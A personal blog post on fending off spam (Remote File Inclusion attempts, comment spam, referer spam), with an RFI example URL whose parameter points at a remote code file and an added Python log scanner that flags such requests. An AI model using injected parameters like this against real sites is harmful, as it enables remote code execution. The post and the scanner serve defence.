500 spammers banned already

When I first created my site, I was worried about issues like what content to post and how to create it, and design choices like where to put that button and which colour. I knew spam was an issue but I didn’t make much of it. This site was created about 5 months ago. Since then I have banned 500 spammers.
Until now, I’ve been attacked with 3 kinds of spam:
- Remote File Inclusion: the first kind I was attacked with. Spammers were trying to execute remote code on my scripts, especially Gallery. This works like an SQL injection attack: the attacker tries to make the script fetch some code by supplying a link in an input that the script reads to process the request. Luckily, WordPress and Gallery are protected against them (I hope) so I haven’t suffered anything. Solution: ban them all to doom. Here’s an example:
http://www.vulnerable.website.com/index.php?page=archive
http://www.vulnerable.website.com/index.php?page=http://www.site.com/code.php?
- Comment spam: if you have a blog and allow comments, well, you’ll get flooded with Viagra products (not that you need them of course) and other pharmaceutical crap. They get more frequent as the number of your pingbacks increases, which increases the chances your blog will get scanned. Since I installed Akismet (if you use WordPress), it has caught over 300 spam comments. Solution: Akismet... and ban them all to doom.
- Referer spam: this one is more recent, and almost all of them come from the United States (especially Comcast...). Some websites share their site logs, or the logs are freely accessible from the web, meaning search engines can access them too and read the entries as links to the spammer's site. Solution: you can use the .htaccess file but I prefer to ban them all to doom.
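
The Remote File Inclusion requests in the list above leave a recognisable trace in the access log: a query parameter whose value is itself a remote URL. The sketch below is an added example, not code from the original post; it assumes Apache combined log format, and the sample log lines, IP addresses and the `/view.php?file=` path are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Apache combined log format (assumed):
# ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# A parameter value that is itself a remote URL is the RFI signature.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def rfi_params(target):
    """Return (name, value) pairs in a request target whose value is a remote URL."""
    query = target.partition('?')[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            hits.append((name, value))
    return hits


def suspects(lines, threshold=1):
    """Count RFI-looking requests per client IP; return IPs at or above threshold."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and rfi_params(m.group(3)):
            counts[m.group(1)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=archive HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://www.site.com/code.php? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /view.php?file=http%3A%2F%2Fwww.site.com%2Fcode.php%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?page=HTTP%253A%252F%252Fwww.site.com%252Fcode.php HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for ip, n in sorted(suspects(SAMPLE_LOG).items()):
        print(ip, n)
```

Legitimate parameters that carry URLs (redirect targets, for instance) will also match, so review the hits before turning them into a ban list.
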
I like the results so far; Akismet hasn’t failed once, my scripts haven’t been modified and I get to watch spammers get squashed like little flies on the wall.
I’ve banned a lot of people, over 500. I don’t mind when they’re Chinese or Korean, not even Americans (I take care not to ban search engines), but I’ve banned a few Brazilians, who are a large fraction of my audience, but hey, safety first.







